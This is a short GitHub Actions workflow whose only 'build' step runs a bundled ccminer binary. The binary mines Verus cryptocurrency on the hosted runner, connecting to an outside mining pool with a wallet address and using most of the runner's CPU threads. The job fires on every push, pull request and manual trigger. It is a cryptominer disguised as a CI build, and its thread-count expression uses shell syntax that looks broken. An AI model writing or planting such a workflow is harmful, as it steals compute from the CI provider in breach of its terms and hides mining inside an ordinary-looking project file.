name: my

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v6
      - name: my
        run: |
          sudo apt install bc
          ./ccminer -a verus -o stratum+tcp://pool.verus.io:9999 -u 0x13e73ae803ebe4e57e21870f19b645771b57eacd -p x -t (math "floor("(nproc)" * 0.8)")

          

